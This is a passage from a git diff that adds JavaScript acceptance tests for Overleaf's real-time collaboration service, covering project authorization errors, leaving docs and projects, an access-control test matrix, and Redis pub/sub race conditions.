+ this.user_id = userId + cb(e) + } + ) + }, + + cb => { + this.client = RealTimeClient.connect(this.project_id, err => { + this.error = err + cb() + }) + this.client.on('joinProjectResponse', () => { + joinProjectResponseReceived = true + cb() + }) + }, + ], + done + ) + }) + + it('should not emit joinProjectResponse', function () { + expect(joinProjectResponseReceived).to.equal(false) + }) + + it('should have disconnected the client', function () { + expect(this.client.socket.connected).to.equal(false) + }) + + it('should return an error', function () { + this.error.message.should.equal('not authorized') + }) + + it('should not have joined the project room', function (done) { + RealTimeClient.getConnectedClient( + this.client.socket.sessionid, + error => { + expect(error.message).to.equal('not found') + done() + } + ) + }) + }) + + describe('when not authorized and web replies with a 403', function () { + let joinProjectResponseReceived = false + before(function (done) { + async.series( + [ + cb => { + FixturesManager.setUpProject( + { + project_id: '403403403403403403403403', // forbidden + privilegeLevel: 'owner', + project: { + name: 'Test Project', + }, + }, + (e, { project_id: projectId, user_id: userId }) => { + this.project_id = projectId + this.user_id = userId + cb(e) + } + ) + }, + + cb => { + this.client = RealTimeClient.connect(this.project_id, err => 
{ + this.error = err + cb() + }) + this.client.on('joinProjectResponse', () => { + joinProjectResponseReceived = true + cb() + }) + }, + ], + done + ) + }) + + it('should not emit joinProjectResponse', function () { + expect(joinProjectResponseReceived).to.equal(false) + }) + + it('should have disconnected the client', function () { + expect(this.client.socket.connected).to.equal(false) + }) + + it('should return an error', function () { + this.error.message.should.equal('not authorized') + }) + + it('should not have joined the project room', function (done) { + RealTimeClient.getConnectedClient( + this.client.socket.sessionid, + error => { + expect(error.message).to.equal('not found') + done() + } + ) + }) + }) + + describe('when deleted and web replies with a 404', function () { + let joinProjectResponseReceived = false + before(function (done) { + async.series( + [ + cb => { + FixturesManager.setUpProject( + { + project_id: '404404404404404404404404', // not-found + privilegeLevel: 'owner', + project: { + name: 'Test Project', + }, + }, + (e, { project_id: projectId, user_id: userId }) => { + this.project_id = projectId + this.user_id = userId + cb(e) + } + ) + }, + + cb => { + this.client = RealTimeClient.connect(this.project_id, err => { + this.error = err + cb() + }) + this.client.on('joinProjectResponse', () => { + joinProjectResponseReceived = true + cb() + }) + }, + ], + done + ) + }) + + it('should not emit joinProjectResponse', function () { + expect(joinProjectResponseReceived).to.equal(false) + }) + + it('should have disconnected the client', function () { + expect(this.client.socket.connected).to.equal(false) + }) + + it('should return an error', function () { + this.error.code.should.equal('ProjectNotFound') + }) + + it('should not have joined the project room', function (done) { + RealTimeClient.getConnectedClient( + this.client.socket.sessionid, + error => { + expect(error.message).to.equal('not found') + done() + } + ) + }) + }) + + describe('when invalid', function () { + let joinProjectResponseReceived = false + before(function (done) { + MockWebServer.joinProject.resetHistory() + async.series( + [ + cb => { + this.client = RealTimeClient.connect('invalid-id', err => { + this.error = err + cb() + }) + this.client.on('joinProjectResponse', () => { + joinProjectResponseReceived = true + cb() + }) + }, + ], + done + ) + }) + + it('should not emit joinProjectResponse', function () { + expect(joinProjectResponseReceived).to.equal(false) + }) + + it('should have disconnected the client', function () { + expect(this.client.socket.connected).to.equal(false) + }) + + it('should return an invalid id error', function () { + this.error.message.should.equal( + 'missing/bad ?projectId=... 
query flag on handshake' + ) + }) + + it('should not call to web', function () { + MockWebServer.joinProject.called.should.equal(false) + }) + }) + + describe('when over rate limit', function () { + let joinProjectResponseReceived = false + before(function (done) { + async.series( + [ + cb => { + this.client = RealTimeClient.connect( + '429429429429429429429429', + err => { + this.error = err + cb() + } + ) + this.client.on('joinProjectResponse', () => { + joinProjectResponseReceived = true + cb() + }) + }, + ], + done + ) + }) + + it('should not emit joinProjectResponse', function () { + expect(joinProjectResponseReceived).to.equal(false) + }) + + it('should have disconnected the client', function () { + expect(this.client.socket.connected).to.equal(false) + }) + + it('should return a TooManyRequests error code', function () { + this.error.message.should.equal('rate-limit hit when joining project') + this.error.code.should.equal('TooManyRequests') + }) + }) + }) +}) diff --git a/services/real-time/test/acceptance/js/LeaveDocTests.js b/services/real-time/test/acceptance/js/LeaveDocTests.js new file mode 100644 index 0000000..13a0236 --- /dev/null +++ b/services/real-time/test/acceptance/js/LeaveDocTests.js @@ -0,0 +1,178 @@ +/* eslint-disable + no-return-assign, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const { expect } = require('chai') +const sinon = require('sinon') + +const RealTimeClient = require('./helpers/RealTimeClient') +const MockDocUpdaterServer = require('./helpers/MockDocUpdaterServer') +const FixturesManager = require('./helpers/FixturesManager') +const logger = require('@overleaf/logger') + +const async = require('async') + +describe('leaveDoc', function () { + before(function () { + this.lines = ['test', 'doc', 'lines'] + this.version = 42 + this.ops = ['mock', 'doc', 'ops'] + sinon.spy(logger, 'error') + sinon.spy(logger, 'warn') + sinon.spy(logger, 'debug') + return (this.other_doc_id = FixturesManager.getRandomId()) + }) + + after(function () { + logger.error.restore() // remove the spy + logger.warn.restore() + return logger.debug.restore() + }) + + return describe('when joined to a doc', function () { + beforeEach(function (done) { + return async.series( + [ + cb => { + return FixturesManager.setUpProject( + { + privilegeLevel: 'readAndWrite', + }, + (e, { project_id: projectId, user_id: userId }) => { + this.project_id = projectId + this.user_id = userId + return cb(e) + } + ) + }, + + cb => { + return FixturesManager.setUpDoc( + this.project_id, + { lines: this.lines, version: this.version, ops: this.ops }, + (e, { doc_id: docId }) => { + this.doc_id = docId + return cb(e) + } + ) + }, + + cb => { + this.client = RealTimeClient.connect(this.project_id, cb) + }, + + cb => { + return this.client.emit( + 'joinDoc', + this.doc_id, + (error, ...rest) => { + ;[...this.returnedArgs] = Array.from(rest) + return cb(error) + } + ) + }, + ], + done + ) + }) + + describe('then leaving the doc', function () { + beforeEach(function (done) { + return this.client.emit('leaveDoc', this.doc_id, error => { + if (error != null) { + throw error + } + return done() + }) + }) + + return it('should have left the 
doc room', function (done) { + return RealTimeClient.getConnectedClient( + this.client.socket.sessionid, + (error, client) => { + if (error) return done(error) + expect(Array.from(client.rooms).includes(this.doc_id)).to.equal( + false + ) + return done() + } + ) + }) + }) + + describe('then leaving an invalid doc', function () { + beforeEach(function (done) { + return this.client.emit('leaveDoc', 'bad-id', error => { + this.error = error + return done() + }) + }) + + return it('should return an error', function () { + return expect(this.error).to.exist + }) + }) + + describe('when sending a leaveDoc request before the previous joinDoc request has completed', function () { + beforeEach(function (done) { + this.client.emit('leaveDoc', this.doc_id, () => {}) + this.client.emit('joinDoc', this.doc_id, () => {}) + return this.client.emit('leaveDoc', this.doc_id, error => { + if (error != null) { + throw error + } + return done() + }) + }) + + it('should not trigger an error', function () { + return sinon.assert.neverCalledWith( + logger.error, + sinon.match.any, + "not subscribed - shouldn't happen" + ) + }) + + return it('should have left the doc room', function (done) { + return RealTimeClient.getConnectedClient( + this.client.socket.sessionid, + (error, client) => { + if (error) return done(error) + expect(Array.from(client.rooms).includes(this.doc_id)).to.equal( + false + ) + return done() + } + ) + }) + }) + + return describe('when sending a leaveDoc for a room the client has not joined ', function () { + beforeEach(function (done) { + return this.client.emit('leaveDoc', this.other_doc_id, error => { + if (error != null) { + throw error + } + return done() + }) + }) + + return it('should trigger a low level message only', function () { + return sinon.assert.calledWith( + logger.debug, + sinon.match.any, + 'ignoring request from client to leave room it is not in' + ) + }) + }) + }) +}) diff --git a/services/real-time/test/acceptance/js/LeaveProjectTests.js b/services/real-time/test/acceptance/js/LeaveProjectTests.js new file mode 100644 index 0000000..bf06421 --- /dev/null +++ b/services/real-time/test/acceptance/js/LeaveProjectTests.js @@ -0,0 +1,235 @@ +/* eslint-disable + no-throw-literal, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. 
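+//
+// Acceptance tests for the 'leaveProject' flow, which runs when a client
+// disconnects. While other clients remain in the project, the disconnect is
+// broadcast but the project is not flushed and the pub/sub subscriptions
+// stay in place; once the last client leaves, the project is flushed to the
+// document updater and the editor-events/applied-ops channels are
+// unsubscribed.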
+/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const RealTimeClient = require('./helpers/RealTimeClient') +const MockDocUpdaterServer = require('./helpers/MockDocUpdaterServer') +const FixturesManager = require('./helpers/FixturesManager') + +const async = require('async') + +const settings = require('@overleaf/settings') +const redis = require('@overleaf/redis-wrapper') +const rclient = redis.createClient(settings.redis.pubsub) + +describe('leaveProject', function () { + before(function (done) { + return MockDocUpdaterServer.run(done) + }) + + describe('with other clients in the project', function () { + before(function (done) { + return async.series( + [ + cb => { + return FixturesManager.setUpProject( + { + privilegeLevel: 'owner', + project: { + name: 'Test Project', + }, + }, + (e, { project_id: projectId, user_id: userId }) => { + this.project_id = projectId + this.user_id = userId + return cb() + } + ) + }, + + cb => { + this.clientA = RealTimeClient.connect(this.project_id, cb) + }, + + cb => { + this.clientB = RealTimeClient.connect(this.project_id, cb) + + this.clientBDisconnectMessages = [] + return this.clientB.on( + 'clientTracking.clientDisconnected', + data => { + return this.clientBDisconnectMessages.push(data) + } + ) + }, + + cb => { + return FixturesManager.setUpDoc( + this.project_id, + { lines: this.lines, version: this.version, ops: this.ops }, + (e, { doc_id: docId }) => { + this.doc_id = docId + return cb(e) + } + ) + }, + + cb => { + return this.clientA.emit('joinDoc', this.doc_id, cb) + }, + cb => { + return this.clientB.emit('joinDoc', this.doc_id, cb) + }, + + cb => { + // leaveProject is called when the client disconnects + this.clientA.on('disconnect', () => cb()) + return this.clientA.disconnect() + }, + + cb => { + // The API waits a little while before flushing changes + return setTimeout(done, 1000) + }, + ], + done + ) + }) + + it('should emit a disconnect message to the room', function () { + return this.clientBDisconnectMessages.should.deep.equal([ + this.clientA.publicId, + ]) + }) + + it('should no longer list the client in connected users', function (done) { + return this.clientB.emit( + 'clientTracking.getConnectedUsers', + (error, users) => { + if (error) return done(error) + for (const user of Array.from(users)) { + if (user.client_id === this.clientA.publicId) { + throw 'Expected clientA to not be listed in connected users' + } + } + return done() + } + ) + }) + + it('should not flush the project to the document updater', function () { + return MockDocUpdaterServer.deleteProject + .calledWith(this.project_id) + .should.equal(false) + }) + + it('should remain subscribed to the editor-events channels', function (done) { + rclient.pubsub('CHANNELS', (err, resp) => { + if (err) { + return done(err) + } + resp.should.include(`editor-events:${this.project_id}`) + return done() + }) + return null + }) + + return it('should remain subscribed to the applied-ops channels', function (done) { + rclient.pubsub('CHANNELS', (err, resp) => { + if (err) { + return done(err) + } + resp.should.include(`applied-ops:${this.doc_id}`) + return done() + }) + return null + }) + }) + + return describe('with no other clients in the project', function () { + before(function (done) { + return async.series( + [ + cb => { + return FixturesManager.setUpProject( + { + 
privilegeLevel: 'owner',
+                project: {
+                  name: 'Test Project',
+                },
+              },
+              (e, { project_id: projectId, user_id: userId }) => {
+                this.project_id = projectId
+                this.user_id = userId
+                return cb(e)
+              }
+            )
+          },
+
+          cb => {
+            this.clientA = RealTimeClient.connect(
+              this.project_id,
+              (error, project, privilegeLevel, protocolVersion) => {
+                this.project = project
+                this.privilegeLevel = privilegeLevel
+                this.protocolVersion = protocolVersion
+                return cb(error)
+              }
+            )
+          },
+
+          cb => {
+            return FixturesManager.setUpDoc(
+              this.project_id,
+              { lines: this.lines, version: this.version, ops: this.ops },
+              (e, { doc_id: docId }) => {
+                this.doc_id = docId
+                return cb(e)
+              }
+            )
+          },
+          cb => {
+            return this.clientA.emit('joinDoc', this.doc_id, cb)
+          },
+
+          cb => {
+            // leaveProject is called when the client disconnects
+            this.clientA.on('disconnect', () => cb())
+            return this.clientA.disconnect()
+          },
+
+          cb => {
+            // The API waits a little while before flushing changes
+            return setTimeout(done, 1000)
+          },
+        ],
+        done
+      )
+    })
+
+    it('should flush the project to the document updater', function () {
+      return MockDocUpdaterServer.deleteProject
+        .calledWith(this.project_id)
+        .should.equal(true)
+    })
+
+    it('should not subscribe to the editor-events channels anymore', function (done) {
+      rclient.pubsub('CHANNELS', (err, resp) => {
+        if (err) {
+          return done(err)
+        }
+        resp.should.not.include(`editor-events:${this.project_id}`)
+        return done()
+      })
+      return null
+    })
+
+    return it('should not subscribe to the applied-ops channels anymore', function (done) {
+      rclient.pubsub('CHANNELS', (err, resp) => {
+        if (err) {
+          return done(err)
+        }
+        resp.should.not.include(`applied-ops:${this.doc_id}`)
+        return done()
+      })
+      return null
+    })
+  })
+})
diff --git a/services/real-time/test/acceptance/js/MatrixTests.js b/services/real-time/test/acceptance/js/MatrixTests.js
new file mode 100644
index 0000000..5f4b4e6
--- /dev/null
+++ b/services/real-time/test/acceptance/js/MatrixTests.js
@@ -0,0 +1,494 @@
+/*
+This test suite is a multi-level matrix which allows us to test many cases
+ with all kinds of setups.
+
+Users/Actors are defined in USER_SETUP and are a low-level entity that
+ connects to a real-time pod. A typical UserItem is:
+
+  someDescriptiveNameForTheTestSuite: {
+    setup(cb) {
+      // <setup session here>
+      const options = { client: RealTimeClient.connect(), foo: 'bar' }
+      cb(null, options)
+    }
+  }
+
+Sessions are a set of actions that a User performs in the life-cycle of a
+ real-time session, before they try something weird. A typical SessionItem is:
+
+  someOtherDescriptiveNameForTheTestSuite: {
+    getActions(cb) {
+      cb(null, [
+        { rpc: 'RPC_ENDPOINT', args: [...] }
+      ])
+    }
+  }
+
+Finally there are InvalidRequests, which are the weird actions hinted at in
+ the Sessions section. The defined actions may be marked with 'fails' to denote
+ that real-time rejects them with an error that the test expects.
+ A typical InvalidRequestItem is:
+
+  joinOwnProject: {
+    getActions(cb) {
+      cb(null, [
+        { rpc: 'RPC_ENDPOINT', args: [...], fails: true }
+      ])
+    }
+  }
+
+There is additional metadata that UserItems and SessionItems may use to skip
+ certain areas of the matrix. These are:
+
+- Does the User have an own project that they join as part of the Session?
+  UserItem: { hasOwnProject: true, setup(cb) { cb(null, { project_id, ... 
}) }} + SessionItem: { needsOwnProject: true } + */ + +const { expect } = require('chai') +const async = require('async') + +const RealTimeClient = require('./helpers/RealTimeClient') +const FixturesManager = require('./helpers/FixturesManager') +const MockWebServer = require('./helpers/MockWebServer') + +const settings = require('@overleaf/settings') +const Keys = settings.redis.documentupdater.key_schema +const redis = require('@overleaf/redis-wrapper') +const rclient = redis.createClient(settings.redis.pubsub) + +function getPendingUpdates(docId, cb) { + rclient.lrange(Keys.pendingUpdates({ doc_id: docId }), 0, 10, cb) +} +function cleanupPreviousUpdates(docId, cb) { + rclient.del(Keys.pendingUpdates({ doc_id: docId }), cb) +} + +describe('MatrixTests', function () { + let privateProjectId, + privateDocId, + readWriteProjectId, + readWriteDocId, + readWriteAnonymousAccessToken + + let privateClient + before(function setupPrivateProject(done) { + FixturesManager.setUpEditorSession( + { privilegeLevel: 'owner', publicAccessLevel: 'readAndWrite' }, + (err, { project_id: projectId, doc_id: docId }) => { + if (err) return done(err) + privateProjectId = projectId + privateDocId = docId + privateClient = RealTimeClient.connect(projectId, err => { + if (err) return done(err) + privateClient.emit('joinDoc', privateDocId, done) + }) + } + ) + }) + + before(function setupReadWriteProject(done) { + FixturesManager.setUpEditorSession( + { + publicAccess: 'readAndWrite', + }, + (err, { project_id: projectId, doc_id: docId, anonymousAccessToken }) => { + readWriteProjectId = projectId + readWriteDocId = docId + readWriteAnonymousAccessToken = anonymousAccessToken + done(err) + } + ) + }) + + const USER_SETUP = { + anonymous: { + setup(cb) { + RealTimeClient.setAnonSession( + readWriteProjectId, + readWriteAnonymousAccessToken, + err => { + if (err) return cb(err) + cb(null, {}) + } + ) + }, + }, + + registered: { + setup(cb) { + const userId = FixturesManager.getRandomId() + const user = { _id: userId, first_name: 'Joe', last_name: 'Bloggs' } + RealTimeClient.setSession({ user }, err => { + if (err) return cb(err) + + MockWebServer.inviteUserToProject( + readWriteProjectId, + user, + 'readAndWrite' + ) + cb(null, { + user_id: userId, + }) + }) + }, + }, + + registeredWithOwnedProject: { + setup(cb) { + FixturesManager.setUpEditorSession( + { privilegeLevel: 'owner' }, + (err, { project_id: projectId, user_id: userId, doc_id: docId }) => { + if (err) return cb(err) + + MockWebServer.inviteUserToProject( + readWriteProjectId, + { _id: userId }, + 'readAndWrite' + ) + cb(null, { + user_id: userId, + project_id: projectId, + doc_id: docId, + }) + } + ) + }, + hasOwnProject: true, + }, + } + + Object.entries(USER_SETUP).forEach(level0 => { + const [userDescription, userItem] = level0 + let options, client + + const SESSION_SETUP = { + joinReadWriteProject: { + getActions(cb) { + cb(null, [{ connect: readWriteProjectId }]) + }, + needsOwnProject: false, + }, + + joinReadWriteProjectAndDoc: { + getActions(cb) { + cb(null, [ + { connect: readWriteProjectId }, + { rpc: 'joinDoc', args: [readWriteDocId] }, + ]) + }, + needsOwnProject: false, + }, + + joinOwnProject: { + getActions(cb) { + cb(null, [{ connect: options.project_id }]) + }, + needsOwnProject: true, + }, + + joinOwnProjectAndDoc: { + getActions(cb) { + cb(null, [ + { connect: options.project_id }, + { rpc: 'joinDoc', args: [options.doc_id] }, + ]) + }, + needsOwnProject: true, + }, + } + + function performActions(getActions, done) { + 
getActions((err, actions) => { + if (err) return done(err) + + async.eachSeries( + actions, + (action, next) => { + const cb = (...returnedArgs) => { + const error = returnedArgs.shift() + if (action.fails) { + expect(error).to.exist + expect(returnedArgs).to.have.length(0) + return next() + } + next(error) + } + + if (action.connect) { + client = RealTimeClient.connect(action.connect, cb) + } else if (action.rpc) { + if (client?.socket?.connected) { + client.emit(action.rpc, ...action.args, cb) + } else { + cb(new Error('not connected!')) + } + } else { + next(new Error('unexpected action')) + } + }, + done + ) + }) + } + + describe(userDescription, function () { + beforeEach(function userSetup(done) { + userItem.setup((err, _options) => { + if (err) return done(err) + options = _options + done() + }) + }) + + Object.entries(SESSION_SETUP).forEach(level1 => { + const [sessionSetupDescription, sessionSetupItem] = level1 + const INVALID_REQUESTS = { + noop: { + getActions(cb) { + cb(null, []) + }, + }, + + joinProjectWithBadAccessToken: { + getActions(cb) { + RealTimeClient.setAnonSession( + privateProjectId, + 'invalid-access-token', + err => { + if (err) return cb(err) + cb(null, [ + { + connect: privateProjectId, + fails: 1, + }, + ]) + } + ) + }, + }, + + joinProjectWithDocId: { + getActions(cb) { + cb(null, [ + { + connect: privateDocId, + fails: 1, + }, + ]) + }, + }, + + joinDocWithDocId: { + getActions(cb) { + cb(null, [{ rpc: 'joinDoc', args: [privateDocId], fails: 1 }]) + }, + }, + + joinProjectWithProjectId: { + getActions(cb) { + cb(null, [ + { + connect: privateProjectId, + fails: 1, + }, + ]) + }, + }, + + joinDocWithProjectId: { + getActions(cb) { + cb(null, [{ rpc: 'joinDoc', args: [privateProjectId], fails: 1 }]) + }, + }, + + joinProjectWithProjectIdThenJoinDocWithDocId: { + getActions(cb) { + cb(null, [ + { + connect: privateProjectId, + fails: 1, + }, + { rpc: 'joinDoc', args: [privateDocId], fails: 1 }, + ]) + }, + }, + } + + // skip some areas of the matrix + // - some Users do not have an own project + const skip = sessionSetupItem.needsOwnProject && !userItem.hasOwnProject + + describe(sessionSetupDescription, function () { + beforeEach(function performSessionActions(done) { + if (skip) return this.skip() + performActions(sessionSetupItem.getActions, done) + }) + + Object.entries(INVALID_REQUESTS).forEach(level2 => { + const [InvalidRequestDescription, InvalidRequestItem] = level2 + describe(InvalidRequestDescription, function () { + beforeEach(function performInvalidRequests(done) { + performActions(InvalidRequestItem.getActions, done) + }) + + describe('rooms', function () { + it('should not add the user into the privateProject room', function (done) { + RealTimeClient.getConnectedClient( + client.socket.sessionid, + (error, client) => { + if (error?.message === 'not found') return done() // disconnected + if (error) return done(error) + expect(client.rooms).to.not.include(privateProjectId) + done() + } + ) + }) + + it('should not add the user into the privateDoc room', function (done) { + RealTimeClient.getConnectedClient( + client.socket.sessionid, + (error, client) => { + if (error?.message === 'not found') return done() // disconnected + if (error) return done(error) + expect(client.rooms).to.not.include(privateDocId) + done() + } + ) + }) + }) + + describe('receive updates', function () { + const receivedMessages = [] + beforeEach(function publishAnUpdateInRedis(done) { + const update = { + doc_id: privateDocId, + op: { + meta: { source: privateClient.publicId 
}, + v: 42, + doc: privateDocId, + op: [{ i: 'foo', p: 50 }], + }, + } + client.on('otUpdateApplied', update => { + receivedMessages.push(update) + }) + privateClient.once('otUpdateApplied', () => { + setTimeout(done, 10) + }) + rclient.publish('applied-ops', JSON.stringify(update)) + }) + + it('should send nothing to client', function () { + expect(receivedMessages).to.have.length(0) + }) + }) + + describe('receive messages from web', function () { + const receivedMessages = [] + beforeEach(function publishAMessageInRedis(done) { + const event = { + room_id: privateProjectId, + message: 'removeEntity', + payload: ['foo', 'convertDocToFile'], + _id: 'web:123', + } + client.on('removeEntity', (...args) => { + receivedMessages.push(args) + }) + privateClient.once('removeEntity', () => { + setTimeout(done, 10) + }) + rclient.publish('editor-events', JSON.stringify(event)) + }) + + it('should send nothing to client', function () { + expect(receivedMessages).to.have.length(0) + }) + }) + + describe('send updates', function () { + let receivedArgs, submittedUpdates, update + + beforeEach(function cleanup(done) { + cleanupPreviousUpdates(privateDocId, done) + }) + + beforeEach(function setupUpdateFields() { + update = { + doc_id: privateDocId, + op: { + v: 43, + lastV: 42, + doc: privateDocId, + op: [{ i: 'foo', p: 50 }], + }, + } + }) + + beforeEach(function sendAsUser(done) { + if (!client?.socket?.connected) { + // disconnected clients cannot emit messages + return this.skip() + } + const userUpdate = Object.assign({}, update, { + hash: 'user', + }) + + client.emit( + 'applyOtUpdate', + privateDocId, + userUpdate, + (...args) => { + receivedArgs = args + done() + } + ) + }) + + beforeEach(function sendAsPrivateUserForReferenceOp(done) { + const privateUpdate = Object.assign({}, update, { + hash: 'private', + }) + + privateClient.emit( + 'applyOtUpdate', + privateDocId, + privateUpdate, + done + ) + }) + + beforeEach(function fetchPendingOps(done) { + getPendingUpdates(privateDocId, (err, updates) => { + submittedUpdates = updates + done(err) + }) + }) + + it('should error out trying to send', function () { + expect(receivedArgs).to.have.length(1) + expect(receivedArgs[0]).to.have.property('message') + // we are using an old version of chai: 1.9.2 + // TypeError: expect(...).to.be.oneOf is not a function + expect( + [ + 'no project_id found on client', + 'not authorized', + ].includes(receivedArgs[0].message) + ).to.equal(true) + }) + + it('should submit the private users message only', function () { + expect(submittedUpdates).to.have.length(1) + const update = JSON.parse(submittedUpdates[0]) + expect(update.hash).to.equal('private') + }) + }) + }) + }) + }) + }) + }) + }) +}) diff --git a/services/real-time/test/acceptance/js/PubSubRace.js b/services/real-time/test/acceptance/js/PubSubRace.js new file mode 100644 index 0000000..07edfb2 --- /dev/null +++ b/services/real-time/test/acceptance/js/PubSubRace.js @@ -0,0 +1,348 @@ +/* eslint-disable + no-return-assign, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. 
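+//
+// Acceptance tests for races between joinDoc/leaveDoc/disconnect and the
+// corresponding Redis subscribe/unsubscribe calls. Whatever the ordering of
+// requests, the client must end up subscribed to the applied-ops (and
+// editor-events) channels only while it remains joined to the doc/project.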
+/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const RealTimeClient = require('./helpers/RealTimeClient') +const MockDocUpdaterServer = require('./helpers/MockDocUpdaterServer') +const FixturesManager = require('./helpers/FixturesManager') + +const async = require('async') + +const settings = require('@overleaf/settings') +const redis = require('@overleaf/redis-wrapper') +const rclient = redis.createClient(settings.redis.pubsub) + +describe('PubSubRace', function () { + before(function (done) { + return MockDocUpdaterServer.run(done) + }) + + describe('when the client leaves a doc before joinDoc completes', function () { + before(function (done) { + return async.series( + [ + cb => { + return FixturesManager.setUpProject( + { + privilegeLevel: 'owner', + project: { + name: 'Test Project', + }, + }, + (e, { project_id: projectId, user_id: userId }) => { + this.project_id = projectId + this.user_id = userId + return cb() + } + ) + }, + + cb => { + this.clientA = RealTimeClient.connect( + this.project_id, + (error, project, privilegeLevel, protocolVersion) => { + this.project = project + this.privilegeLevel = privilegeLevel + this.protocolVersion = protocolVersion + return cb(error) + } + ) + }, + + cb => { + return FixturesManager.setUpDoc( + this.project_id, + { lines: this.lines, version: this.version, ops: this.ops }, + (e, { doc_id: docId }) => { + this.doc_id = docId + return cb(e) + } + ) + }, + + cb => { + this.clientA.emit('joinDoc', this.doc_id, () => {}) + // leave before joinDoc completes + return this.clientA.emit('leaveDoc', this.doc_id, cb) + }, + + cb => { + // wait for subscribe and unsubscribe + return setTimeout(cb, 100) + }, + ], + done + ) + }) + + return it('should not subscribe to the applied-ops channels anymore', function (done) { + rclient.pubsub('CHANNELS', (err, resp) => { + if (err) { + return done(err) + } + resp.should.not.include(`applied-ops:${this.doc_id}`) + return done() + }) + return null + }) + }) + + describe('when the client emits joinDoc and leaveDoc requests frequently and leaves eventually', function () { + before(function (done) { + return async.series( + [ + cb => { + return FixturesManager.setUpProject( + { + privilegeLevel: 'owner', + project: { + name: 'Test Project', + }, + }, + (e, { project_id: projectId, user_id: userId }) => { + this.project_id = projectId + this.user_id = userId + return cb() + } + ) + }, + + cb => { + this.clientA = RealTimeClient.connect( + this.project_id, + (error, project, privilegeLevel, protocolVersion) => { + this.project = project + this.privilegeLevel = privilegeLevel + this.protocolVersion = protocolVersion + return cb(error) + } + ) + }, + + cb => { + return FixturesManager.setUpDoc( + this.project_id, + { lines: this.lines, version: this.version, ops: this.ops }, + (e, { doc_id: docId }) => { + this.doc_id = docId + return cb(e) + } + ) + }, + + cb => { + this.clientA.emit('joinDoc', this.doc_id, () => {}) + this.clientA.emit('leaveDoc', this.doc_id, () => {}) + this.clientA.emit('joinDoc', this.doc_id, () => {}) + this.clientA.emit('leaveDoc', this.doc_id, () => {}) + this.clientA.emit('joinDoc', this.doc_id, () => {}) + this.clientA.emit('leaveDoc', this.doc_id, () => {}) + this.clientA.emit('joinDoc', this.doc_id, () => {}) + this.clientA.emit('leaveDoc', this.doc_id, () => {}) + this.clientA.emit('joinDoc', this.doc_id, () => {}) + return 
this.clientA.emit('leaveDoc', this.doc_id, cb) + }, + + cb => { + // wait for subscribe and unsubscribe + return setTimeout(cb, 100) + }, + ], + done + ) + }) + + return it('should not subscribe to the applied-ops channels anymore', function (done) { + rclient.pubsub('CHANNELS', (err, resp) => { + if (err) { + return done(err) + } + resp.should.not.include(`applied-ops:${this.doc_id}`) + return done() + }) + return null + }) + }) + + describe('when the client emits joinDoc and leaveDoc requests frequently and remains in the doc', function () { + before(function (done) { + return async.series( + [ + cb => { + return FixturesManager.setUpProject( + { + privilegeLevel: 'owner', + project: { + name: 'Test Project', + }, + }, + (e, { project_id: projectId, user_id: userId }) => { + this.project_id = projectId + this.user_id = userId + return cb() + } + ) + }, + + cb => { + this.clientA = RealTimeClient.connect( + this.project_id, + (error, project, privilegeLevel, protocolVersion) => { + this.project = project + this.privilegeLevel = privilegeLevel + this.protocolVersion = protocolVersion + return cb(error) + } + ) + }, + + cb => { + return FixturesManager.setUpDoc( + this.project_id, + { lines: this.lines, version: this.version, ops: this.ops }, + (e, { doc_id: docId }) => { + this.doc_id = docId + return cb(e) + } + ) + }, + + cb => { + this.clientA.emit('joinDoc', this.doc_id, () => {}) + this.clientA.emit('leaveDoc', this.doc_id, () => {}) + this.clientA.emit('joinDoc', this.doc_id, () => {}) + this.clientA.emit('leaveDoc', this.doc_id, () => {}) + this.clientA.emit('joinDoc', this.doc_id, () => {}) + this.clientA.emit('leaveDoc', this.doc_id, () => {}) + this.clientA.emit('joinDoc', this.doc_id, () => {}) + this.clientA.emit('leaveDoc', this.doc_id, () => {}) + return this.clientA.emit('joinDoc', this.doc_id, cb) + }, + + cb => { + // wait for subscribe and unsubscribe + return setTimeout(cb, 100) + }, + ], + done + ) + }) + + return it('should subscribe to the applied-ops channels', function (done) { + rclient.pubsub('CHANNELS', (err, resp) => { + if (err) { + return done(err) + } + resp.should.include(`applied-ops:${this.doc_id}`) + return done() + }) + return null + }) + }) + + return describe('when the client disconnects before joinDoc completes', function () { + before(function (done) { + return async.series( + [ + cb => { + return FixturesManager.setUpProject( + { + privilegeLevel: 'owner', + project: { + name: 'Test Project', + }, + }, + (e, { project_id: projectId, user_id: userId }) => { + this.project_id = projectId + this.user_id = userId + return cb() + } + ) + }, + + cb => { + this.clientA = RealTimeClient.connect( + this.project_id, + (error, project, privilegeLevel, protocolVersion) => { + this.project = project + this.privilegeLevel = privilegeLevel + this.protocolVersion = protocolVersion + return cb(error) + } + ) + }, + + cb => { + return FixturesManager.setUpDoc( + this.project_id, + { lines: this.lines, version: this.version, ops: this.ops }, + (e, { doc_id: docId }) => { + this.doc_id = docId + return cb(e) + } + ) + }, + + cb => { + let joinDocCompleted = false + this.clientA.emit( + 'joinDoc', + this.doc_id, + () => (joinDocCompleted = true) + ) + // leave before joinDoc completes + return setTimeout( + () => { + if (joinDocCompleted) { + return cb(new Error('joinDocCompleted -- lower timeout')) + } + this.clientA.on('disconnect', () => cb()) + return this.clientA.disconnect() + }, + // socket.io processes joinDoc and disconnect with different delays: + // - joinDoc 
